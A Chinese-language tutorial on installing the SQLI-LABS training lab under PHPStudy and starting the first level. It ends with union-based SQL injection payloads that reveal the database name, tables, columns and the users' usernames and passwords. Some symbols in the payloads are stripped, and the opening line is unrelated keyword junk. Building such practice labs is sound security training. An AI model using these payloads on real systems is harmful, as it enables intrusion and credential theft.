如何搭建网站赚点击,网站免费正能量小说,如何建设手机端网站,wordpress关注公众号阅读更多注意#xff1a;文中涉及演示均为模拟测试#xff0c;切勿用于真实环境#xff0c;任何未授权测试都是违法行为#xff01;
一、环境准备
下载PHPStudy 官网下载地址#xff1a;https://www.xp.cn/php-study#xff08;选择Windows版#xff09;
安装时建议选择自定…注意文中涉及演示均为模拟测试切勿用于真实环境任何未授权测试都是违法行为
一、环境准备
下载PHPStudy 官网下载地址https://www.xp.cn/php-study选择Windows版
安装时建议选择自定义路径如 D:\phpstudy_pro避免系统盘权限问题
下载SQLI-LABS源码 从GitHub获取源码包https://github.com/Audi-1/sqli-labs 下载完成后解压将文件夹重命名为sqli-labs避免中文路径。
二、PHPStudy配置
启动基础服务 打开PHPStudy启动Apache和MySQL服务图2服务启动界面。
若MySQL启动失败检查端口是否被占用默认3306。
切换PHP版本 点击左侧菜单【网站】→ 选择【管理】→【PHP版本】→更多→ 安装PHP5.5.9SQLI-LABS不支持PHP7。 切换后需重启Apache服务图3PHP版本切换界面。
三、部署SQLI-LABS靶场 放置源码文件 将sqlilabs文件夹复制到PHPStudy的网站根目录默认路径D:\phpstudy_pro\WWW。 配置数据库连接 打开文件sqlilabs/sql-connections/db-creds.inc修改以下参数 $dbuser root; // 数据库用户名默认
$dbpass root; // 数据库密码若未修改则为空四、初始化靶场数据库
访问靶场页面 浏览器输入http://localhost/sqli-labs/进入SQLI-LABS首页。
点击页面中的Setup/reset Database for labs链接
验证初始化结果 若显示Congratulations! Database is connected...表示数据库创建成功。 若报错mysql_connect() undefined需检查PHP版本是否为5.x 。
五、开始注入练习
选择关卡 返回首页点击Less-1基础注入关卡通过URL参数?id1测试注入点。 示例Payload?id1 and 12 union select 1,2,3 --查看显示位 ?id1 and 12 union select 1,2,database()--显示出数据库名 ?id1 and 12 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() 查看数据库的所有表 ?id1 and 12 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers --查看users表中的字段 ?id1 and 12 union select 1,2,group_concat(username,0x7e,password) from security.users --查看全部用户名和密码
还可以下载phpmyadmin管理数据库 2. 常见问题排查 数据库连接失败检查db-creds.inc密码是否与PHPStudy的MySQL一致。 页面无法访问确认sqlilabs文件夹是否位于WWW目录且Apache端口未被占用。